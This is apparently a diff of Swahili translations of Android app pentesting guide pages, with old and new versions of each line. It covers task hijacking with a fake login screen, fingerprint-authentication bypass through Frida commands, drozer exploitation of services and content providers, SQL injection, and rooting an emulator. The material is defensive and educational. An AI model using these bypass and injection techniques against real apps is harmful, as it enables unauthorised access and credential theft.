Kwa kupakia maudhui, mbinu kama `loadUrl`, `loadData`, na `loadDataWithBaseURL` zinapatikana. Ni muhimu kuhakikisha URLs hizi au faili ni **salama kutumia**. Mipangilio ya usalama inaweza kudhibitiwa kupitia darasa la `WebSettings`. Kwa mfano, kuzima JavaScript kwa `setJavaScriptEnabled(false)` kunaweza kuzuia mashambulizi ya XSS.
"Bridge" ya JavaScript inaruhusu vitu vya Java kuingiliana na JavaScript, ikihitaji mbinu kuwekewa alama na `@JavascriptInterface` kwa usalama kuanzia Android 4.2.
"Bridge" ya JavaScript inaruhusu vitu vya Java kuingiliana na JavaScript, ikihitaji mbinu kuwekewa alama na `@JavascriptInterface` kwa usalama kuanzia Android 4.2 kuendelea.
Kuruhusu ufikiaji wa maudhui (`setAllowContentAccess(true)`) kunaruhusu WebViews kufikia Watoa Maudhui, ambayo inaweza kuwa hatari isipokuwa URLs za maudhui zihakikishwe kuwa salama.
@ -346,7 +346,7 @@ Ili kudhibiti ufikiaji wa faili:
### **Saini ya Kidijitali ya Programu**
- **Saini ya kidijitali** ni lazima kwa programu za Android, kuhakikisha zimeandikwa **kwa uhalisia** kabla ya usakinishaji. Mchakato huu unatumia cheti kwa ajili ya utambulisho wa programu na lazima uhakikishwe na meneja wa pakiti wa kifaa wakati wa usakinishaji. Programu zinaweza kuwa **zimejitia saini au kuthibitishwa na CA ya nje**, kulinda dhidi ya ufikiaji usioidhinishwa na kuhakikisha programu inabaki bila kubadilishwa wakati wa kuwasilishwa kwa kifaa.
- **Saini ya kidijitali** ni lazima kwa programu za Android, kuhakikisha zimeandikwa **kwa uhalisia** kabla ya usakinishaji. Mchakato huu unatumia cheti kwa utambulisho wa programu na lazima uhakikishwe na meneja wa pakiti wa kifaa wakati wa usakinishaji. Programu zinaweza kuwa **zimejitia saini au kuthibitishwa na CA ya nje**, kulinda dhidi ya ufikiaji usioidhinishwa na kuhakikisha programu inabaki bila kubadilishwa wakati wa usafirishaji wake kwa kifaa.
### **Uhakikisho wa Programu kwa Usalama Bora**

8
src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
View File

@ -4,7 +4,7 @@
## Task, Back Stack and Foreground Activities
Katika Android, **task** kimsingi ni seti ya shughuli ambazo watumiaji wanashirikiana nazo ili kukamilisha kazi maalum, zimepangwa ndani ya **back stack**. Stack hii inaweka shughuli kulingana na wakati zilifunguliwa, huku shughuli ya hivi karibuni ikionekana juu kama **foreground activity**. Wakati wowote, shughuli hii pekee ndiyo inaonekana kwenye skrini, na kuifanya kuwa sehemu ya **foreground task**.
Katika Android, **task** kimsingi ni seti ya shughuli ambazo watumiaji wanashirikiana nazo ili kukamilisha kazi maalum, zimepangwa ndani ya **back stack**. Stack hii inaweka shughuli kwa msingi wa wakati zilifunguliwa, huku shughuli ya hivi karibuni ikionekana juu kama **foreground activity**. Katika wakati wowote, shughuli hii pekee ndiyo inaonekana kwenye skrini, na kuifanya kuwa sehemu ya **foreground task**.
Hapa kuna muhtasari wa mabadiliko ya shughuli:
@ -23,21 +23,21 @@ Katika programu za Android, **task affinity** inaelezea kazi inayopendelea shugh
### Launch Modes
Attribute ya `launchMode` inaelekeza usimamizi wa mifano ya shughuli ndani ya kazi. Modo ya **singleTask** ni muhimu kwa shambulio hili, ikielekeza hali tatu kulingana na mifano ya shughuli zilizopo na mechi za task affinity. Uhalifu unategemea uwezo wa programu ya mshambuliaji kuiga task affinity ya programu lengwa, ikipotosha mfumo wa Android kuanzisha programu ya mshambuliaji badala ya lengwa lililotarajiwa.
Attribute ya `launchMode` inaelekeza usimamizi wa mifano ya shughuli ndani ya kazi. Hali ya **singleTask** ni muhimu kwa shambulio hili, ikielekeza hali tatu kulingana na mifano ya shughuli zilizopo na mechi za task affinity. Uhalifu unategemea uwezo wa programu ya mshambuliaji kuiga task affinity ya programu lengwa, ikipotosha mfumo wa Android kuanzisha programu ya mshambuliaji badala ya lengwa lililokusudiwa.
### Detailed Attack Steps
1. **Malicious App Installation**: Mwathirika anaweka programu ya mshambuliaji kwenye kifaa chao.
2. **Initial Activation**: Mwathirika kwanza anafungua programu ya uhalifu, akitayarisha kifaa kwa shambulio.
3. **Target App Launch Attempt**: Mwathirika anajaribu kufungua programu lengwa.
4. **Hijack Execution**: Kutokana na mechi ya task affinity, programu ya uhalifu inazinduliwa badala ya programu lengwa.
4. **Hijack Execution**: Kutokana na mechi ya task affinity, programu ya uhalifu inaanzishwa badala ya programu lengwa.
5. **Deception**: Programu ya uhalifu inaonyesha skrini ya kuingia bandia inayofanana na programu lengwa, ikimdanganya mtumiaji kuingiza taarifa nyeti.
Kwa utekelezaji wa vitendo wa shambulio hili, rejelea hifadhi ya Task Hijacking Strandhogg kwenye GitHub: [Task Hijacking Strandhogg](https://github.com/az0mb13/Task_Hijacking_Strandhogg).
### Prevention Measures
Ili kuzuia mashambulizi kama haya, waendelezaji wanaweza kuweka `taskAffinity` kuwa string tupu na kuchagua modo ya uzinduzi ya `singleInstance`, kuhakikisha kutengwa kwa programu yao kutoka kwa nyingine. Kubadilisha kazi ya `onBackPressed()` inatoa ulinzi wa ziada dhidi ya hijacking ya kazi.
Ili kuzuia mashambulizi kama haya, waendelezaji wanaweza kuweka `taskAffinity` kuwa string tupu na kuchagua hali ya uzinduzi ya `singleInstance`, kuhakikisha kutengwa kwa programu yao kutoka kwa nyingine. Kubadilisha kazi ya `onBackPressed()` kunatoa ulinzi wa ziada dhidi ya hijacking ya kazi.
## **References**

6
src/mobile-pentesting/android-app-pentesting/apk-decompilers.md
View File

@ -22,13 +22,13 @@ Kama decompiler ya GUI ya kwanza ya Java, **JD-Gui** inakuwezesha kuchunguza msi
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
Pamoja na **Bytecode-Viewer**, unaweza kuchambua faili za APK kwa kutumia decompilers nyingi. Baada ya kupakua, endesha Bytecode-Viewer, pakia APK yako, na chagua decompilers unazotaka kutumia kwa uchambuzi wa pamoja.
Pamoja na **Bytecode-Viewer**, unaweza kuchambua faili za APK kwa kutumia decompilers mbalimbali. Baada ya kupakua, endesha Bytecode-Viewer, pakia APK yako, na chagua decompilers unazotaka kutumia kwa uchambuzi wa pamoja.
### [Enjarify](https://github.com/Storyyeller/enjarify)
**Enjarify** inatafsiri Dalvik bytecode kuwa Java bytecode, ikiruhusu zana za uchambuzi wa Java kuchambua programu za Android kwa ufanisi zaidi.
- Ili kutumia Enjarify, endesha: `enjarify app.apk` Hii inazalisha Java bytecode inayolingana na APK iliyotolewa.
- Ili kutumia Enjarify, endesha: `enjarify app.apk` Hii inazalisha Java bytecode sawa na APK iliyotolewa.
### [CFR](https://github.com/leibnitz27/cfr)
@ -57,6 +57,6 @@ Kwa decompilation rahisi na **procyon**:
### [frida-DEXdump](https://github.com/hluwa/frida-dexdump)
Chombo hiki kinaweza kutumika kutoa DEX ya APK inayotembea kwenye kumbukumbu. Hii husaidia kushinda obfuscation ya statiki ambayo inondolewa wakati programu inatekelezwa kwenye kumbukumbu.
Chombo hiki kinaweza kutumika kutoa DEX ya APK inayotembea katika kumbukumbu. Hii husaidia kushinda obfuscation ya statiki ambayo inondolewa wakati programu inatekelezwa katika kumbukumbu.
{{#include ../../banners/hacktricks-training.md}}

20
src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
View File

@ -8,7 +8,7 @@ Asante sana kwa [**@offsecjay**](https://twitter.com/offsecjay) kwa msaada wake
Android Studio inaruhusu **kufanya kazi na mashine za virtual za Android ambazo unaweza kutumia kujaribu APKs**. Ili kuzitumia utahitaji:
- **Zana za Android SDK** - [Pakua hapa](https://developer.android.com/studio/releases/sdk-tools).
- Zana za **Android SDK** - [Pakua hapa](https://developer.android.com/studio/releases/sdk-tools).
- Au **Android Studio** (pamoja na zana za Android SDK) - [Pakua hapa](https://developer.android.com/studio).
Katika Windows (katika kesi yangu) **baada ya kufunga Android Studio** nilikuwa na **Zana za SDK zilizofungwa katika**: `C:\Users\<UserName>\AppData\Local\Android\Sdk\tools`
@ -18,7 +18,7 @@ Katika mac unaweza **kupakua zana za SDK** na kuwa nazo katika PATH ukifanya:
brew tap homebrew/cask
brew install --cask android-sdk
```
Au kutoka **Android Studio GUI** kama ilivyoonyeshwa katika [https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a) ambayo itasakinisha katika `~/Library/Android/sdk/cmdline-tools/latest/bin/` na `~/Library/Android/sdk/platform-tools/` na `~/Library/Android/sdk/emulator/`
Au kutoka **Android Studio GUI** kama ilivyoonyeshwa katika [https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a) ambayo itawaweka katika `~/Library/Android/sdk/cmdline-tools/latest/bin/` na `~/Library/Android/sdk/platform-tools/` na `~/Library/Android/sdk/emulator/`
Kwa matatizo ya Java:
```java
@ -58,7 +58,7 @@ Mashine halisi itaundwa. Sasa **kila wakati unapoingia AVD manager itakuwa ipo**
### Endesha Mashine Halisi
Ili **kuendesha** bonyeza tu _**Start button**_.
Ili **kuendesha** ni lazima ubonyeze _**Start button**_.
![](<../../images/image (518).png>)
@ -92,7 +92,7 @@ Name: Nexus 10
OEM : Google
[...]
```
Mara tu umeamua jina la kifaa unachotaka kutumia, unahitaji **kuamua picha gani ya Android unayotaka kuendesha katika kifaa hiki.**\
Mara tu umepanga jina la kifaa unachotaka kutumia, unahitaji **kuamua picha gani ya Android unayotaka kuendesha katika kifaa hiki.**\
Unaweza kuorodhesha chaguo zote kwa kutumia `sdkmanager`:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat --list
@ -117,12 +117,12 @@ Type: Platform
API level: 29
Revision: 4
```
Katika wakati huu umekamua kifaa unachotaka kutumia na umepakua picha ya Android, hivyo **unaweza kuunda mashine ya virtual kwa kutumia**:
Kwa wakati huu umeshafanya uamuzi kuhusu kifaa unachotaka kutumia na umepakua picha ya Android, hivyo **unaweza kuunda mashine ya virtual kwa kutumia**:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat -v create avd -k "system-images;android-28;google_apis;x86_64" -n "AVD9" -d "Nexus 5X"
```
Katika amri ya mwisho **nilifanya VM inayoitwa** "_AVD9_" kwa kutumia **kifaa** "_Nexus 5X_" na **picha ya Android** "_system-images;android-28;google_apis;x86_64_".\
Sasa unaweza **kuorodhesha mashine za virtual** ulizozifanya kwa:
Sasa unaweza **orodhesha mashine za virtual** ulizozifanya kwa:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list avd
@ -145,7 +145,7 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -list-avds
AVD9
Pixel_2_API_27
```
Unaweza kwa urahisi **kuendesha mashine yoyote ya virtual iliyoundwa** kwa kutumia:
Unaweza kwa urahisi **kufanya kazi na mashine yoyote ya virtual iliyoundwa** kwa kutumia:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "VirtualMachineName"
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9"
@ -165,7 +165,7 @@ Hata hivyo kuna **chaguzi nyingi tofauti za mstari wa amri zinazofaa** ambazo un
**Network**
- `-dns-server 192.0.2.0, 192.0.2.255` : Ruhusu kuashiria kwa kutenganisha kwa koma seva za DNS kwa VM.
- `-dns-server 192.0.2.0, 192.0.2.255` : Ruhusu kuashiria seva za DNS kwa VM kwa kutumia alama ya koma.
- **`-http-proxy 192.168.1.12:8080`** : Ruhusu kuashiria proxy ya HTTP kutumia (inasaidia sana kukamata trafiki kwa kutumia Burp)
- `-port 5556` : Weka nambari ya bandari ya TCP inayotumika kwa console na adb.
- `-ports 5556,5559` : Weka bandari za TCP zinazotumika kwa console na adb.
@ -176,7 +176,7 @@ Hata hivyo kuna **chaguzi nyingi tofauti za mstari wa amri zinazofaa** ambazo un
- `-selinux {disabled|permissive}` : Weka moduli ya usalama ya Security-Enhanced Linux kuwa katika hali ya kuzuiwa au ya ruhusa kwenye mfumo wa uendeshaji wa Linux.
- `-timezone Europe/Paris` : Weka eneo la muda kwa kifaa cha virtual
- `-screen {touch(default)|multi-touch|o-touch}` : Weka hali ya skrini ya kugusa iliyosimuliwa.
- **`-writable-system`** : Tumia chaguo hili kuwa na picha ya mfumo inayoweza kuandikwa wakati wa kikao chako cha emulation. Utahitaji pia kuendesha `adb root; adb remount`. Hii ni muhimu sana kufunga cheti kipya katika mfumo.
- **`-writable-system`** : Tumia chaguo hili kuwa na picha ya mfumo inayoweza kuandikwa wakati wa kikao chako cha emulation. Utahitaji pia kukimbia `adb root; adb remount`. Hii ni muhimu sana kufunga cheti kipya katika mfumo.
## Rooting a Play Store device
@ -185,7 +185,7 @@ Ikiwa umepakua kifaa chenye Play Store huwezi kupata root moja kwa moja, na utap
$ adb root
adbd cannot run as root in production builds
```
Kwa kutumia [rootAVD](https://github.com/newbit1/rootAVD) na [Magisk](https://github.com/topjohnwu/Magisk) niliweza ku-root hiyo (fuata kwa mfano [**hii video**](https://www.youtube.com/watch?v=Wk0ixxmkzAI) **au** [**hii moja**](https://www.youtube.com/watch?v=qQicUW0svB8)).
Kwa kutumia [rootAVD](https://github.com/newbit1/rootAVD) pamoja na [Magisk](https://github.com/topjohnwu/Magisk) niliweza ku-root hiyo (fuata kwa mfano [**hii video**](https://www.youtube.com/watch?v=Wk0ixxmkzAI) **au** [**hii moja**](https://www.youtube.com/watch?v=qQicUW0svB8)).
## Sakinisha Cheti cha Burp

16
src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
View File

@ -4,7 +4,7 @@
## **Method 1 Bypassing with No Crypto Object Usage**
Mwelekeo hapa ni kwenye _onAuthenticationSucceeded_ callback, ambayo ni muhimu katika mchakato wa uthibitishaji. Watafiti kutoka WithSecure walitengeneza [Frida script](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js), inayowezesha kupita _CryptoObject_ ya NULL katika _onAuthenticationSucceeded(...)_. Script inasababisha kupita kiotomatiki kwa uthibitisho wa alama za vidole wakati wa wito wa njia hiyo. Hapa chini kuna kipande kilichorahisishwa kinachoonyesha kupita katika muktadha wa Alama za Vidole za Android, huku programu kamili ikipatikana kwenye [GitHub](https://github.com/St3v3nsS/InsecureBanking).
Mwelekeo hapa ni kwenye _onAuthenticationSucceeded_ callback, ambayo ni muhimu katika mchakato wa uthibitishaji. Watafiti katika WithSecure walitengeneza [Frida script](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js), inayowezesha kupita _CryptoObject_ ya NULL katika _onAuthenticationSucceeded(...)_. Script inasababisha kupita kiotomatiki kwa uthibitishaji wa alama za vidole wakati wa wito wa njia hiyo. Hapa chini kuna kipande kilichorahisishwa kinachoonyesha kupita katika muktadha wa Alama za Vidole za Android, huku programu kamili ikipatikana kwenye [GitHub](https://github.com/St3v3nsS/InsecureBanking).
```javascript
biometricPrompt = new BiometricPrompt(this, executor, new BiometricPrompt.AuthenticationCallback() {
@Override
@ -25,7 +25,7 @@ Command to run the Frida script:
```bash
frida -U -f com.generic.insecurebankingfingerprint --no-pause -l fingerprint-bypass-via-exception-handling.js
```
Upon reaching the fingerprint screen and the initiation of `authenticate()`, type `bypass()`` in the Frida console to activate the bypass:
Wakati unafika kwenye skrini ya alama za vidole na kuanzishwa kwa `authenticate()`, andika `bypass()` kwenye console ya Frida ili kuanzisha bypass:
```
Spawning com.generic.insecurebankingfingerprint...
[Android Emulator 5554::com.generic.insecurebankingfingerprint]-> Hooking BiometricPrompt.authenticate()...
@ -35,7 +35,7 @@ Hooking FingerprintManager.authenticate()...
```
## **Method 3 Instrumentation Frameworks**
Instrumentation frameworks kama Xposed au Frida zinaweza kutumika kuingilia njia za programu wakati wa utendaji. Kwa uthibitisho wa alama za vidole, mifumo hii inaweza:
Frameworks za uhandisi kama Xposed au Frida zinaweza kutumika kuingilia njia za programu wakati wa wakati. Kwa uthibitisho wa alama za vidole, frameworks hizi zinaweza:
1. **Kufanya Kazi za Uthibitishaji**: Kwa kuingilia katika `onAuthenticationSucceeded`, `onAuthenticationFailed`, au `onAuthenticationError` njia za `BiometricPrompt.AuthenticationCallback`, unaweza kudhibiti matokeo ya mchakato wa uthibitisho wa alama za vidole.
2. **Kupita SSL Pinning**: Hii inaruhusu mshambuliaji kukamata na kubadilisha trafiki kati ya mteja na seva, ikibadilisha mchakato wa uthibitisho au kuiba data nyeti.
@ -44,20 +44,20 @@ Mfano wa amri kwa Frida:
```bash
frida -U -l script-to-bypass-authentication.js --no-pause -f com.generic.in
```
## **Method 4 Uhandisi wa Kurudi & Marekebisho ya Kanuni**
## **Mbinu ya 4 Uhandisi wa Kurudi na Marekebisho ya Kanuni**
Zana za uhandisi wa kurudi kama `APKTool`, `dex2jar`, na `JD-GUI` zinaweza kutumika kubadilisha programu ya Android, kusoma kanuni yake ya chanzo, na kuelewa mfumo wake wa uthibitishaji. Hatua kwa ujumla zinajumuisha:
1. **Kuharibu APK**: Badilisha faili ya APK kuwa muundo unaoweza kusomwa na binadamu zaidi (kama kanuni ya Java).
1. **Kuhariri APK**: Badilisha faili ya APK kuwa muundo unaoweza kusomwa na binadamu zaidi (kama kanuni ya Java).
2. **Kuchambua Kanuni**: Tafuta utekelezaji wa uthibitishaji wa alama za vidole na tambua udhaifu wa uwezekano (kama mifumo ya kurudi nyuma au ukaguzi usio sahihi).
3. **Kurekebisha APK**: Baada ya kubadilisha kanuni ili kupita uthibitishaji wa alama za vidole, programu inarekebishwa, kusainiwa, na kufungwa kwenye kifaa kwa ajili ya majaribio.
## **Method 5 Kutumia Zana za Uthibitishaji za Kijadi**
## **Mbinu ya 5 Kutumia Zana za Uthibitishaji za Kijadi**
Kuna zana maalum na skripti zilizoundwa ili kujaribu na kupita mifumo ya uthibitishaji. Kwa mfano:
1. **Moduli za MAGISK**: MAGISK ni zana kwa Android inayowaruhusu watumiaji ku-root vifaa vyao na kuongeza moduli zinazoweza kubadilisha au kudanganya taarifa za kiwango cha vifaa, ikiwa ni pamoja na alama za vidole.
2. **Skripti zilizojengwa kwa Kijadi**: Skripti zinaweza kuandikwa ili kuingiliana na Android Debug Bridge (ADB) au moja kwa moja na backend ya programu ili kuiga au kupita uthibitishaji wa alama za vidole.
1. **Moduli za MAGISK**: MAGISK ni zana kwa Android inayowaruhusu watumiaji ku-root vifaa vyao na kuongeza moduli ambazo zinaweza kubadilisha au kudanganya taarifa za kiwango cha vifaa, ikiwa ni pamoja na alama za vidole.
2. **Skripti zilizojengwa kwa Kijadi**: Skripti zinaweza kuandikwa ili kuingiliana na Daraja la Debug la Android (ADB) au moja kwa moja na nyuma ya programu ili kuiga au kupita uthibitishaji wa alama za vidole.
## Marejeo

6
src/mobile-pentesting/android-app-pentesting/content-protocol.md
View File

@ -12,13 +12,13 @@ Kwa matokeo rafiki zaidi kwa binadamu, kuonyesha tu kitambulisho na njia ya kila
```bash
$ content query --uri content://media/external/file --projection _id,_data
```
Watoa maudhui wamejengwa katika eneo lao la kibinafsi. Upatikanaji wa mtoa huduma unahitaji URI maalum ya `content://`. Taarifa kuhusu njia za kufikia mtoa huduma zinaweza kupatikana kutoka kwa hati za programu au ms source code wa mfumo wa Android.
Watoa maudhui wamejengwa katika eneo lao la kibinafsi. Upatikanaji wa mtoa huduma unahitaji URI maalum ya `content://`. Taarifa kuhusu njia za kufikia mtoa huduma zinaweza kupatikana kutoka kwa hati za programu au ms source code wa Android framework.
### Upatikanaji wa Chrome kwa Watoa Maudhui
Chrome kwenye Android inaweza kufikia watoa maudhui kupitia mpango wa `content://`, ikiruhusu kufikia rasilimali kama picha au hati zilizotolewa na programu za wahusika wengine. Ili kuonyesha hili, faili inaweza kuingizwa kwenye Media Store na kisha kufikiwa kupitia Chrome:
Ingiza kipengee maalum kwenye Media Store:
Ingiza kipengele maalum kwenye Media Store:
```bash
cd /sdcard
echo "Hello, world!" > test.txt
@ -32,7 +32,7 @@ content query --uri content://media/external/file \
--projection _id,_data | grep test.txt
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt
```
Faili linaweza kisha kuangaliwa katika Chrome kwa kutumia URL iliyoundwa na kitambulisho cha faili.
Faili linaweza kuangaliwa katika Chrome kwa kutumia URL iliyoundwa na kitambulisho cha faili.
Kwa mfano, ili orodhesha faili zinazohusiana na programu maalum:
```bash

36
src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
View File

@ -4,22 +4,22 @@
## APKs za kupima
## APKs to test
- [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (kutoka mrwlabs)
- [DIVA](https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz)
**Sehemu za mafunzo haya zilitolewa kutoka kwenye** [**dokumentasiyo ya Drozer pdf**](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)**.**
**Sehemu za mafunzo haya zilitolewa kutoka kwenye** [**Drozer documentation pdf**](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)**.**
## Usanidi
## Installation
Sakinisha Drozer Client ndani ya mwenyeji wako. Pakua kutoka kwenye [toleo la hivi karibuni](https://github.com/mwrlabs/drozer/releases).
Sakinisha Drozer Client ndani ya mwenyeji wako. Pakua kutoka kwenye [latest releases](https://github.com/mwrlabs/drozer/releases).
```bash
pip install drozer-2.4.4-py2-none-any.whl
pip install twisted
pip install service_identity
```
Pakua na sakinisha drozer APK kutoka kwa [toleo la hivi karibuni](https://github.com/mwrlabs/drozer/releases). Wakati huu ni [hii](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk).
Pakua na usakinishe drozer APK kutoka kwa [toleo la hivi karibuni](https://github.com/mwrlabs/drozer/releases). Wakati huu ni [hii](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk).
```bash
adb install drozer.apk
```
@ -39,24 +39,24 @@ drozer console connect
```
## Amri za Kuvutia
| **Amri** | **Maelezo** |
| -------------- | --------------------------------------------------------------------------------------------------------------------------------------------------- |
| **Help MODULE**| Inaonyesha msaada wa moduli iliyochaguliwa |
| **Amri** | **Maelezo** |
| -------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- |
| **Help MODULE**| Inaonyesha msaada wa moduli iliyochaguliwa |
| **list** | Inaonyesha orodha ya moduli zote za drozer ambazo zinaweza kutekelezwa katika kikao cha sasa. Hii inaficha moduli ambazo huna ruhusa sahihi za kuendesha. |
| **shell** | Anza shell ya Linux ya kuingiliana kwenye kifaa, katika muktadha wa Agent. |
| **clean** | Ondoa faili za muda zilizohifadhiwa na drozer kwenye kifaa cha Android. |
| **load** | Pakia faili inayoshikilia amri za drozer na uzitekeleze kwa mpangilio. |
| **module** | Tafuta na usakinishe moduli za ziada za drozer kutoka Mtandao. |
| **module** | Tafuta na sakinisha moduli za ziada za drozer kutoka Mtandao. |
| **unset** | Ondoa kigezo kilichopewa jina ambacho drozer hupitisha kwa shell zozote za Linux ambazo inazalisha. |
| **set** | Hifadhi thamani katika kigezo ambacho kitapewa kama kigezo cha mazingira kwa shell zozote za Linux zinazozalishwa na drozer. |
| **set** | Hifadhi thamani katika kigezo ambacho kitapewa kama kigezo cha mazingira kwa shell zozote za Linux zinazozalishwa na drozer. |
| **shell** | Anza shell ya Linux ya kuingiliana kwenye kifaa, katika muktadha wa Agent |
| **run MODULE** | Tekeleza moduli ya drozer |
| **exploit** | Drozer inaweza kuunda exploits za kutekeleza kwenye kifaa. `drozer exploit list` |
| **payload** | Exploits zinahitaji payload. `drozer payload list` |
| **payload** | The exploits need a payload. `drozer payload list` |
### Kifurushi
Pata **jina** la kifurushi kwa kuchuja kwa sehemu ya jina:
Tafuta **jina** la kifurushi kwa kuchuja kwa sehemu ya jina:
```bash
dz> run app.package.list -f sieve
com.mwr.example.sieve
@ -151,7 +151,7 @@ Permission: null
com.mwr.example.sieve.CryptoService
Permission: null
```
#### **Wasiliana** na huduma
#### **Shirikiana** na huduma
```bash
app.service.send Send a Message to a service, and display the reply
app.service.start Start Service
@ -181,9 +181,9 @@ run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --m
**Katika sehemu ya taarifa za msingi za Android unaweza kuona ni nini Vipokeaji vya Matangazo**.
Baada ya kugundua Vipokeaji hivi vya Matangazo unapaswa **kuangalia msimbo** wao. Zingatia kwa makini **`onReceive`** kazi kwani itakuwa inashughulikia ujumbe unaopokelewa.
Baada ya kugundua Vipokeaji hivi vya Matangazo unapaswa **kuangalia msimbo** wao. Zingatia kwa makini **`onReceive`** kazi kwani itakuwa inashughulikia ujumbe uliopokelewa.
#### **Gundua yote** vipokeaji vya matangazo
#### **Gundua wote** vipokeaji vya matangazo
```bash
run app.broadcast.info #Detects all
```
@ -216,7 +216,7 @@ app.broadcast.sniff Register a broadcast receiver that can sniff particu
```
#### Tuma ujumbe
Katika mfano huu ukitumia [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider unaweza **kutuma SMS yoyote** kwa marudio yasiyo ya premium **bila kumuuliza** mtumiaji ruhusa.
Katika mfano huu ukitumia [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider unaweza **kutuma SMS isiyo na mipaka** kwa marudio yoyote yasiyo ya premium **bila kumuuliza** mtumiaji ruhusa.
![](<../../../images/image (415).png>)
@ -239,14 +239,14 @@ Unaweza kupata programu zote zinazoweza kufanyiwa debug na **Drozer**:
```bash
run app.package.debuggable
```
## Tutorials
## Mafunzo
- [https://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-drozer/#gref](https://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-drozer/#gref)
- [https://github.com/mgcfish/mobiletools/blob/master/\_posts/2016-08-01-Using-Drozer-for-application-security-assessments.md](https://github.com/mgcfish/mobiletools/blob/master/_posts/2016-08-01-Using-Drozer-for-application-security-assessments.md)
- [https://www.hackingarticles.in/android-penetration-testing-drozer/](https://www.hackingarticles.in/android-penetration-testing-drozer/)
- [https://medium.com/@ashrafrizvi3006/how-to-test-android-application-security-using-drozer-edc002c5dcac](https://medium.com/@ashrafrizvi3006/how-to-test-android-application-security-using-drozer-edc002c5dcac)
## More info
## Maelezo zaidi
- [https://blog.dixitaditya.com/android-pentesting-cheatsheet/](https://blog.dixitaditya.com/android-pentesting-cheatsheet/)

22
src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
View File

@ -6,9 +6,9 @@
## Intro
Data inapatikana **kutoka kwa programu moja hadi nyingine** kwa ombi la kipengele kinachojulikana kama **content provider**. Ombi hizi zinadhibitiwa kupitia mbinu za **ContentResolver class**. Watoa maudhui wanaweza kuhifadhi data zao katika maeneo mbalimbali, kama vile **database**, **files**, au kupitia **network**.
Data inapatikana **kutoka kwa programu moja hadi nyingine** kwa ombi la kipengele kinachojulikana kama **content provider**. Ombi hizi zinadhibitiwa kupitia **ContentResolver class** methods. Watoa maudhui wanaweza kuhifadhi data zao katika maeneo mbalimbali, kama vile **database**, **files**, au kupitia **network**.
Katika faili ya _Manifest.xml_, tangazo la mtoa maudhui linahitajika. Kwa mfano:
Katika faili _Manifest.xml_, tangazo la mtoa maudhui linahitajika. Kwa mfano:
```xml
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
@ -67,7 +67,7 @@ Swali litakuwa kama: `content://name.of.package.class/declared_name`
## **Database-backed Content Providers**
Labda wengi wa Content Providers hutumiwa kama **interface** kwa **database**. Hivyo, ikiwa unaweza kuipata unaweza kuwa na uwezo wa **kuchota, kusasisha, kuingiza na kufuta** taarifa.\
Angalia ikiwa unaweza **kupata taarifa nyeti** au jaribu kubadilisha ili **kupita** mifumo ya **idhinisha**.
Angalia ikiwa unaweza **kupata taarifa nyeti** au jaribu kubadilisha ili **kuepuka** mifumo ya **idhinisha**.
Unapokagua msimbo wa Content Provider **angalia** pia kwa **functions** zenye majina kama: _query, insert, update na delete_:
@ -87,34 +87,34 @@ password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com
```
### Insert content
### Ingiza maudhui
Kwa kuhoji database utajifunza **jina la safu**, kisha, utaweza kuingiza data katika DB:
Kwa kuuliza kwenye database utaweza kujifunza **jina la safu**, kisha, utaweza kuingiza data kwenye DB:
![](<../../../images/image (98).png>)
![](<../../..//images/image (173).png>)
![](<../../../images/image (173).png>)
_Kumbuka kwamba katika kuingiza na kusasisha unaweza kutumia --string kuashiria string, --double kuashiria double, --float, --integer, --long, --short, --boolean_
### Update content
### Sasisha maudhui
Ukijua jina la safu unaweza pia **kubadilisha entries**:
![](<../../../images/image (780).png>)
### Delete content
### Futa maudhui
![](<../../../images/image (423).png>)
### **SQL Injection**
Ni rahisi kujaribu SQL injection **(SQLite)** kwa kubadilisha **projection** na **selection fields** ambazo zinapitishwa kwa mtoa maudhui.\
Wakati wa kuhoji Mtoa Maudhui kuna hoja 2 za kuvutia kutafuta taarifa: _--selection_ na _--projection_:
